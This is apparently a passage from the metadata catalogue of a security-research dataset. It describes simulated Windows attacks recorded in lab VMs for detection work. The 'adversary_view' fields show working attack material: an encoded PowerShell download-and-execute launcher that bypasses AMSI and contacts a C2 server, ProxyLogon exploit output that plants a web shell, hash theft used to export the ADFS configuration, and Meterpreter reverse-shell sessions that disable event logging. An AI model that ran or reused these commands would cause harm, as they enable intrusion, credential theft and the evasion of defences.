["Administrator"], "adversary_view": "Name : EventCacheManager\nPath : \\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\nState : 3\nEnabled : True\nLastRunTime : 11/30/1999 12:00:00 AM\nLastTaskResult : 267011\nNumberOfMissedRuns : 0\nNextRunTime : 12/30/1899 12:00:00 AM\nDefinition : System.__ComObject\nXml : \n \n \n 2020-12-19T07:00:22\n THESHIRE\\pgustavo\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\n \n \n \n S-1-5-18\n \n \n \n true\n true\n IgnoreNew\n \n PT10M\n PT1H\n true\n false\n \n \n \n \n 2020-12-19T07:00:00\n \n \n \n \n powershell\n -noP -sta -w 1 -enc 
SQBGACgAJABQAFMAVgBFAHIAcwBpAG8ATgBUAGEA\n QgBsAEUALgBQAFMAVgBFAFIAUwBJAG8ATgAuAE0AYQBKAG8AcgAgAC0AZwBFACAAMwApAHsAJABDAD\n MAMgAyAD0AWwBSAEUARgBdAC4AQQBzAFMAZQBNAEIAbABZAC4ARwBFAHQAVAB5AFAAZQAoACcAUwB5\n AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFUAdA\n BpAGwAcwAnACkALgAiAEcARQB0AEYASQBlAGAAbABEACIAKAAnAGMAYQBjAGgAZQBkAEcAcgBvAHUA\n cABQAG8AbABpAGMAeQBTAGUAdAB0AGkAbgBnAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAG\n MALABTAHQAYQB0AGkAYwAnACkAOwBJAEYAKAAkAGMAMwAyADIAKQB7ACQAYwA3ADQAMgA9ACQAYwAz\n ADIAMgAuAEcAZQBUAFYAYQBsAFUAZQAoACQAbgBVAGwAbAApADsASQBGACgAJABDADcANAAyAFsAJw\n BTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AKQB7ACQAYwA3ADQA\n MgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG\n 4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAw\n ADsAJABDADcANAAyAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZw\n AnAF0AWwAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkA\n bwBuAEwAbwBnAGcAaQBuAGcAJwBdAD0AMAB9ACQAVgBBAEwAPQBbAEMAbwBsAGwARQBjAHQASQBvAG\n 4AUwAuAEcAZQBuAGUAUgBpAGMALgBEAEkAYwB0AGkATwBOAGEAUgBZAFsAcwBUAHIAaQBuAGcALABT\n AFkAcwBUAEUAbQAuAE8AYgBKAGUAYwB0AF0AXQA6ADoAbgBFAHcAKAApADsAJAB2AEEATAAuAEEARA\n BEACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4A\n ZwAnACwAMAApADsAJABWAGEATAAuAEEARABEACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAG\n wAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAEMANwA0\n ADIAWwAnAEgASwBFAFkAXwBMAE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBvAGYAdAB3AGEAcg\n BlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwA\n UABvAHcAZQByAFMAaABlAGwAbABcAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAG\n kAbgBnACcAXQA9ACQAdgBBAGwAfQBFAEwAUwBlAHsAWwBTAEMAcgBpAHAAVABCAGwATwBDAGsAXQAu\n ACIARwBFAFQARgBJAGUAYABMAGQAIgAoACcAcwBpAGcAbgBhAHQAdQByAGUAcwAnACwAJwBOACcAKw\n AnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQBUAFYAYQBMAHUARQAoACQA\n 
bgB1AGwAbAAsACgATgBFAFcALQBPAGIASgBFAEMAVAAgAEMAbwBMAGwAZQBDAFQASQBvAE4AcwAuAE\n cARQBuAGUAUgBJAEMALgBIAGEAcwBoAFMAZQB0AFsAcwBUAHIAaQBOAEcAXQApACkAfQAkAFIAZQBG\n AD0AWwBSAGUARgBdAC4AQQBzAFMAZQBtAGIAbABZAC4ARwBlAHQAVABZAFAAZQAoACcAUwB5AHMAdA\n BlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkA\n JwArACcAVQB0AGkAbABzACcAKQA7ACQAUgBlAGYALgBHAGUAdABGAGkARQBMAGQAKAAnAGEAbQBzAG\n kASQBuAGkAdABGACcAKwAnAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABh\n AHQAaQBjACcAKQAuAFMARQB0AFYAYQBMAFUAZQAoACQATgBVAEwATAAsACQAVABSAFUARQApADsAfQ\n A7AFsAUwBZAFMAVABFAE0ALgBOAGUAdAAuAFMAZQBSAFYASQBDAGUAUABPAEkAbgB0AE0AYQBOAGEA\n RwBFAFIAXQA6ADoARQBYAFAAZQBjAFQAMQAwADAAQwBPAE4AdABpAE4AdQBFAD0AMAA7ACQANQA3AD\n kAMwA9AE4ARQB3AC0ATwBiAEoAZQBjAFQAIABTAHkAcwBUAGUATQAuAE4ARQBUAC4AVwBFAEIAQwBM\n AGkAZQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcw\n AgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAA\n cgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAF\n QARQB4AFQALgBFAG4AYwBPAGQAaQBuAGcAXQA6ADoAVQBuAEkAQwBPAEQARQAuAEcARQB0AFMAdABS\n AGkAbgBHACgAWwBDAG8AbgBWAGUAcgB0AF0AOgA6AEYAcgBPAE0AQgBhAHMARQA2ADQAUwB0AHIASQ\n BOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAEwA\n ZwBBAHgAQQBEAEEAQQBMAGcAQQB4AEEARABBAEEATABnAEEAMQBBAEEAPQA9ACcAKQApACkAOwAkAH\n QAPQAnAC8AbABvAGcAaQBuAC8AcAByAG8AYwBlAHMAcwAuAHAAaABwACcAOwAkADUANwA5ADMALgBI\n AGUAYQBkAGUAcgBTAC4AQQBEAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJA\n A1ADcAOQAzAC4AUAByAE8AWAB5AD0AWwBTAHkAcwB0AGUATQAuAE4ARQBUAC4AVwBFAGIAUgBlAHEA\n VQBFAFMAdABdADoAOgBEAEUARgBhAHUAbAB0AFcARQBiAFAAUgBPAFgAeQA7ACQANQA3ADkAMwAuAF\n AAcgBvAFgAWQAuAEMAUgBlAEQARQBuAFQAaQBBAGwAcwAgAD0AIABbAFMAWQBTAHQARQBNAC4ATgBF\n AFQALgBDAHIARQBkAEUATgBUAGkAQQBMAEMAYQBjAEgARQBdADoAOgBEAEUAZgBhAFUAbABUAE4AZQ\n BUAHcAbwBSAGsAQwByAEUAZABFAE4AdABJAGEATABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgA\n 
eQAgAD0AIAAkADUANwA5ADMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAWQBTAHQAZQBtAC4AVABFAH\n gAVAAuAEUATgBjAE8AZABJAE4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAVABCAFkAdABlAFMAKAAn\n ACMANgBGACsAPgBFADgAMgA3AEgAVgBKAEcARAB0AG0AOQB9AFQAQAAqADEAaQB4AD0AXwBkAG4ASQ\n A0AFAAZQAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQBSAEcAcwA7ACQAUwA9ADAALgAuADIA\n NQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbAC\n QAXwAlACQASwAuAEMAbwB1AE4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABK\n AF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKw\n AxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsA\n JABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAH\n gATwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAk\n ADUANwA5ADMALgBIAEUAQQBkAEUAUgBzAC4AQQBEAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAFcAVQ\n BFAGgAaABKAGMAQQBxAEQAbwA9AE4AVgByAE8AYwBsAEQAYQBmAG0AcQBOADAAdABBAEcAMgBGACsA\n TQAvAEwAagBFAHgAdgA4AD0AIgApADsAJABkAGEAVABhAD0AJAA1ADcAOQAzAC4ARABvAHcATgBMAE\n 8AYQBkAEQAQQBUAEEAKAAkAFMAZQBSACsAJABUACkAOwAkAEkAVgA9ACQARABhAHQAYQBbADAALgAu\n ADMAXQA7ACQARABhAHQAYQA9ACQAZABBAHQAYQBbADQALgAuACQAZABhAFQAQQAuAEwAZQBOAGcAVA\n BIAF0AOwAtAGoAbwBJAE4AWwBDAEgAYQByAFsAXQBdACgAJgAgACQAUgAgACQARABhAHQAQQAgACgA\n JABJAFYAKwAkAEsAKQApAHwASQBFAFgA\n \n \n "}, "references": ["https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", "https://github.com/OTRF/Blacksmith/blob/master/resources/scripts/powershell/misc/Update-RemoteTask.ps1"]}, "SDWIN-210314014019": {"title": "Exchange ProxyLogon SSRF RCE Vuln POC", "id": "SDWIN-210314014019", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2021/03/14", "modification_date": "2021/03/14", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents the execution of a public POC to 
abuse Exchange vulnerabilities (CVE-2021-26855 server-side request forgery (SSRF) vulnerability)", "attack_mappings": [{"technique": "T1505", "sub-technique": "003", "tactics": ["TA0003", "TA0002"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/proxylogon_ssrf_rce_poc.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "cmd", "module": "cmd", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "C:\\Users\\wardog.MXS01\\Documents>\nC:\\Users\\wardog.MXS01\\Documents>python public-poc.py localhost wardog@azsentinel.local\nAttacking target localhost\n=============================\nGot DN: /o=azsentinel/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=6beef80bd6d14a68b9ae39df7f27a8cc-wardog\nGot SID: S-1-5-21-594047938-393122191-2580508586-500\nGot session id: e243cd06-1093-40d4-829c-63f3b9caea9b\nGot canary: pYoEXlKOqkGQMt3Dv3qJUExebVlG6NgI3c_XeQNd-VRV8lo6E5zskoLPJB0uOOGITLTC08eVUkk.\nGot OAB id: becafe73-b0c1-4f36-8df4-85f682840ef4\nReady!\n\nTesting command:\n===============\nPOST shell:https://localhost/owa/auth/ohyeah.aspx\ncode\":\"Response.Write(new ActiveXObject(\"WScript.Shell\").exec(\"cmd /c whoami\").StdOut.ReadAll());\n\n\n[*] Waiting for ohyeah.aspx to be available..\n[*] Waiting for ohyeah.aspx to be available..\n\nResults:\n========\nnt authority\\system\n\n\nC:\\Users\\wardog.MXS01\\Documents>"}, "references": ["https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "https://twitter.com/jack_halon/status/1370192318377168897", "https://github.com/OTRF/Azure-Sentinel2Go/tree/master/grocery-list/Win10-AD-MXS"]}, "SDWIN-210427020247": {"title": "Export ADFS Database Configuration Remotely", "id": "SDWIN-210427020247", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2021/04/27", "modification_date": 
"2021/04/27", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents a threat actor exporting the AD FS database configuration remotely over http.", "attack_mappings": [{"technique": "T0000", "sub-technique": null, "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/aadinternals_export_adfsdatabaseconfig_remotely.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/aadinternals_export_adfsdatabaseconfig_remotely.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "PowerShell Module", "name": "AADInternals", "module": "Export-AADIntADFSConfiguration", "script": null}], "permissions_required": ["Domain Admin", "AD FS"], "adversary_view": "# ADFS Service Account\n$UserObjectGUID = 'd1713029-72e2-4101-8486-1db074944f23'\n# Domain Admin credentials\n$credentials = get-credential\n# Get Hash via AD replication\n$Hash = Get-AADIntADUserNTHash -ObjectGuid $UserObjectGUID -Credentials $credentials -Server 'DC01.blacksmith.local' -AsHex\n# Retrieve AD FS database configuration over HTTP\n$ADFSDatabaseConfig = Export-AADIntADFSConfiguration -Hash '97bff5626068f351a5f9891b97b04640' -SID 'S-1-5-21-3226634481-2224579835-4276826623-1103' -Server ADFS01.blacksmith.local"}, "references": null}, "SDWIN-210611210814": {"title": "APT Simulator Cobalt Strike", "id": "SDWIN-210611210814", "contributors": ["Jose Rodriguez @Cyb3rPandaH"], "creation_date": "2021/06/11", "modification_date": "2021/06/11", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset was created after running the Cobalt Strike module from the APT Simulator tool (https://github.com/NextronSystems/APTSimulator).", "attack_mappings": [{"technique": "T1134", "sub-technique": "002", "tactics": ["TA0004", 
"TA0005"]}, {"technique": "T1134", "sub-technique": "001", "tactics": ["TA0004", "TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/other/aptsimulator_cobaltstrike.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Batch Script", "name": "APT Simulator", "module": "Cobalt Strike", "script": "https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/cobaltstrike/cobaltstrike-simulation.bat"}], "permissions_required": ["Administrator"], "adversary_view": "===========================================================================\n ___ ____ ___________ _ __ __\n / | / __ \\/_ __/ ___/(_)___ ___ __ __/ /___ _/ /_____ _____\n / /| | / /_/ / / / \\__ \\/ / __ `__ \\/ / / / / __ `/ __/ __ \\/ ___/\n/ ___ |/ ____/ / / ___/ / / / / / / / /_/ / / /_/ / /_/ /_/ / /\n/_/ |_/_/ /_/ /____/_/_/ /_/ /_/\\__,_/_/\\__,_/\\__/\\____/_/\n\nFlorian Roth, Nextron Systems, v0.9.1, June 2021\n\nSelect the test-set that you want to run:\n\n[0] RUN EVERY TEST\n[1] Collection\n[2] Command and Control\n[3] Credential Access\n[4] Defense Evasion\n[5] Discovery\n[6] Execution\n[7] Lateral Movement\n[8] Persistence\n[9] Privilege Escalation\n\n[C] CobaltStrike Beacon Simulation\n\n[A] Apply AV Exclusions in Registry\n[S] Settings\n[E] Exit\n\nYour selection (then press ENTER): C\n===========================================================================\nSimulate CobaltStrike Beacon Activity\n\n--- Create some default Named Pipes ...\nCreating Named Pipe number 1: MSSE-1337-server\n\nWaiting for 0 seconds, press a key to continue ...\nKilling named pipe creator for pipe 1\nSUCCESS: The process \"CreateNamedPipe.exe\" with PID 4748 has been terminated.\nCreating Named Pipe number 2 (P2P communication): msagent_fedac123\n\nWaiting for 0 seconds, press a key to continue ...\nKilling named pipe creator for pipe 2\nSUCCESS: The process \"CreateNamedPipe.exe\" with PID 
4236 has been terminated.\nCreating Named Pipe number 3 (Post Exploitation): postex_ssh_fedac123\n\nWaiting for 0 seconds, press a key to continue ...\nKilling named pipe creator for pipe 3\nSUCCESS: The process \"CreateNamedPipe.exe\" with PID 7444 has been terminated.\nCreating Named Pipe number 3 (Post Exploitation): postex_ssh_fedac123\n\nWaiting for 0 seconds, press a key to continue ...\nKilling named pipe creator for pipe 3\nSUCCESS: The process \"CreateNamedPipe.exe\" with PID 512 has been terminated.\n\n--- Simulating GetSystem ...\n\nWaiting for 0 seconds, press a key to continue ...\nCopy a service binary file to a suspicious location ...\nUsing Post-CobaltStrike 4.2 scheme\n 1 file(s) copied.\nStarting suspicious service\n[SC] CreateService SUCCESS\n[SC] StartService FAILED 1053:\n\nThe service did not respond to the start or control request in a timely fashion.\n\n[SC] ControlService FAILED 1062:\n\nThe service has not been started.\n\n[SC] DeleteService SUCCESS\n\nWaiting for 0 seconds, press a key to continue ...\nKilling named pipe creator\nERROR: The process \"CreateNamedPipe.exe\" not found.\n\n--- HTTP Beaconing 1\nSimulating HTTP beaconing - this step takes up to an hour to complete\n\nBeacon 1 - HTTP 30s+50//10.0.2.15/pixel.gif\nSending HTTP request ...\n\nC:\\Users\\APT-Simulator\\Documents\\APTSimulator-master>"}, "references": ["https://twitter.com/cyb3rops/status/1403253268051107840"]}, "SDWIN-220630130349": {"title": "Disabling Windows Event Logging via Audit Policy Modification", "id": "SDWIN-220630130349", "contributors": ["Jose Rodriguez @Cyb3rPandaH"], "creation_date": "2022/06/30", "modification_date": "2022/08/18", "platform": ["Windows"], "type": "atomic", "tags": ["auditpol", "cmd", "microsoft windows security auditing"], "description": "After getting a shell with elevated privileges on the target, we used auditpol.exe to modify the current system and user audit policies.\nSuccess and failure events were disabled using the /set 
/remove /clear commands and /success /failure parameters.\nThis dataset was generated using a Windows 10 Pro edition (Version:1903,OS Build:18362.30) and Kali Linux (Version:2022.2).", "attack_mappings": [{"technique": "T1562", "sub-technique": "002", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/auditpol_system_user_auditpolicy_modification.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "auditpol.exe", "module": "auditpol.exe", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "msf6 exploit(multi/handler) > run \n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.44; (UUID: gytdwvr9) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 3 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-18 09:56:27 -0400 \nmeterpreter > execute -f auditpol.exe -H -a '/set /user:pedro /category:\"DS Access\" /success:disable' \nProcess 4392 created.\nmeterpreter > execute -f auditpol.exe -H -a '/set /user:pedro /category:\"DS Access\" /failure:disable' \nProcess 6664 created. \nmeterpreter > execute -f auditpol.exe -H -a '/remove /user:pedro' \nProcess 4440 created. \nmeterpreter > execute -f auditpol.exe -H -a '/set /category:\"Account Logon\" /success:disable' \nProcess 472 created. \nmeterpreter > execute -f auditpol.exe -H -a '/set /category:\"Account Logon\" /failure:disable' \nProcess 2752 created. \nmeterpreter > execute -f auditpol.exe -H -a '/clear /y' \nProcess 7016 created. 
\nmeterpreter > "}, "references": ["https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-process-creation", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol"]}, "SDWIN-220703123711": {"title": "Disabling Process Command Line Logging via Registry Modification", "id": "SDWIN-220703123711", "contributors": ["Jose Rodriguez @Cyb3rPandaH"], "creation_date": "2022/07/03", "modification_date": "2022/08/18", "platform": ["Windows"], "type": "atomic", "tags": ["reg", "cmd", "microsoft windows security auditing"], "description": "After getting a shell with elevated privileges on the target, we used reg.exe to modify the HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit registry key.\nLogging of command line in process creation events for Microsoft Windows Security Auditing was disabled by changing the registry value data from 1 to 0 in the ProcessCreationIncludeCmdLine_Enabled registry value.\nThis dataset was generated using a Windows 10 Pro edition (Version:1903,OS Build:18362.30) and Kali Linux (Version:2022.2).", "attack_mappings": [{"technique": "T1562", "sub-technique": "002", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/reg_cmd_process_commandline_logging_disabled.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/reg_meterpreter_process_commandline_logging_disabled.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "reg.exe", "module": "reg.exe"}, {"type": "Manual", "name": "Metasploit", "module": "reg"}], "permissions_required": ["Administrator"], "adversary_view": "***** Using reg.exe\nmsf6 exploit(multi/handler) > run \n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] 
https://192.168.56.40:8443 handling request from 192.168.56.44; (UUID: kmnbsoc3) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 10 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-18 20:34:35 -0400 \nmeterpreter > shell \nProcess 5028 created. \nChannel 1 created. \nMicrosoft Windows [Version 10.0.18362.30] \n(c) 2019 Microsoft Corporation. All rights reserved. \nC:\\Users\\pedro\\Downloads>reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit /t REG_DWORD /v ProcessCreationIncludeCmdLine_Enabled /d 0 /f \nreg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit /t REG_DWORD /v ProcessCreationIncludeCmdLine_Enabled /d 0 /f \nThe operation completed successfully. \nC:\\Users\\pedro\\Downloads> \n\n***** Using reg (Meterpreter)\nmsf6 exploit(multi/handler) > run \n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.44; (UUID: wqp60sgl) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 4 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-18 18:46:35 -0400 \nmeterpreter > reg setval -k 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit' -v 'ProcessCreationIncludeCmdLine_Enabled' -t 'REG_DWORD' -d 0 \nSuccessfully set ProcessCreationIncludeCmdLine_Enabled of REG_DWORD. 
\nmeterpreter > "}, "references": ["https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-process-creation", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg"]}, "SDWIN-220705170038": {"title": "Modifying Security Event Log File Path via Modification of Log Configuration", "id": "SDWIN-220705170038", "contributors": ["Jose Rodriguez @Cyb3rPandaH"], "creation_date": "2022/07/05", "modification_date": "2022/07/05", "platform": ["Windows"], "type": "atomic", "tags": ["wevtutil", "cmd", "microsoft windows security auditing"], "description": "After getting a shell with elevated privileges on the target, we used wevtutil.exe to modify the configuration of the Security event log.\n\nEvent logs for Microsoft Windows Security Auditing are stored in a different file (Not-Important-Log.evtx) by changing the standard log path C:\\Windows\\System32\\Winevt\\Logs\\Security.evtx.\n\nThis dataset was generated using a Windows 10 Enterprise Evaluation edition (Version:21H1,OS Build:19043.1766) and Kali Linux (Version:2021.3).", "attack_mappings": [{"technique": "T1562", "sub-technique": "002", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_wevtutil_modify_security_eventlog_path.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "cmd", "module": "cmd", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "msf6 exploit(multi/handler) > run\n\n[*] Started HTTPS reverse handler on https://10.0.10.104:8443\n[*] https://10.0.10.104:8443 handling request from 10.0.10.102; (UUID: if81stxw) Staging x64 payload (201308 bytes) ...\n[*] Meterpreter session 2 opened (10.0.10.104:8443 -> 127.0.0.1) at 2022-07-05 17:00:38 -0400\n\nmeterpreter > shell\nProcess 1912 created.\nChannel 1 created.\nMicrosoft Windows [Version 
10.0.19043.1766]\n(c) Microsoft Corporation. All rights reserved.\n\nC:\\Users\\pedro\\Downloads>wevtutil get-log Security\nwevtutil get-log Security\nname: Security\nenabled: true\ntype: Admin\nowningPublisher: \nisolation: Custom\nchannelAccess: O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)\nlogging:\n logFileName: %SystemRoot%\\System32\\Winevt\\Logs\\Security.evtx\n retention: false\n autoBackup: false\n maxSize: 1000000000\npublishing:\n fileMax: 1\n\nC:\\Users\\pedro\\Downloads>wevtutil set-log Security /logfilename:\"C:\\Windows\\System32\\winevt\\Not-Important-Log.evtx\"\nwevtutil set-log Security /logfilename:\"C:\\Windows\\System32\\winevt\\Not-Important-Log.evtx\"\n\nC:\\Users\\pedro\\Downloads>wevtutil get-log Security\nwevtutil get-log Security\nname: Security\nenabled: true\ntype: Admin\nowningPublisher: \nisolation: Custom\nchannelAccess: O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)\nlogging:\n logFileName: C:\\Windows\\System32\\winevt\\Not-Important-Log.evtx\n retention: false\n autoBackup: false\n maxSize: 1000000000\npublishing:\n fileMax: 1\n\nC:\\Users\\pedro\\Downloads>"}, "references": ["https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil"]}, "SDWIN-220708104215": {"title": "Stopping Event Log Service via Modification of Start Up Type", "id": "SDWIN-220708104215", "contributors": ["Jose Rodriguez @Cyb3rPandaH"], "creation_date": "2022/07/08", "modification_date": "2022/08/04", "platform": ["Windows"], "type": "atomic", "tags": ["powershell", "reg", "cmd", "eventlog"], "description": "After getting a shell with elevated privileges on the target, we modified the start up type for the EventLog service to `Disabled`.\n\nAfter the modification, we need to restart our system to make the EventLog service unavailable (Disabled). This data set contains only before-reboot data of our simulation. 
Even though after-reboot data is not part of the dataset, our attempt to disable the EventLog service was successful during the simulation.\n\nWe have simulated this attack using 3 different procedures: REG command via cmd.exe, REG meterpreter command (Metasploit), and the PowerShell module (Metasploit).\n\nThis dataset was generated using a Windows 10 Pro Evaluation edition (Version:1903,OS Build:18362.30) and Kali Linux (Version:2022.2).", "attack_mappings": [{"technique": "T1562", "sub-technique": "002", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_disable_eventlog_service_startuptype_modification.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/reg_disable_eventlog_service_startuptype_modification_via_registry.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_disable_eventlog_service_startuptype_modification_via_registry.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "cmd", "module": "cmd"}, {"type": "Manual", "name": "Metasploit", "module": "reg"}, {"type": "Manual", "name": "Metasploit", "module": "powershell"}], "permissions_required": ["Administrator"], "adversary_view": "**** Using reg command via cmd.exe:\n\nmsf6 exploit(multi/handler) > run \n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: jhdxsqpv) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 20 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-04 11:20:26 -0400 \n\nmeterpreter > shell \nProcess 7728 created. \nChannel 1 created. \nMicrosoft Windows [Version 10.0.18362.30] \n(c) 2019 Microsoft Corporation. 
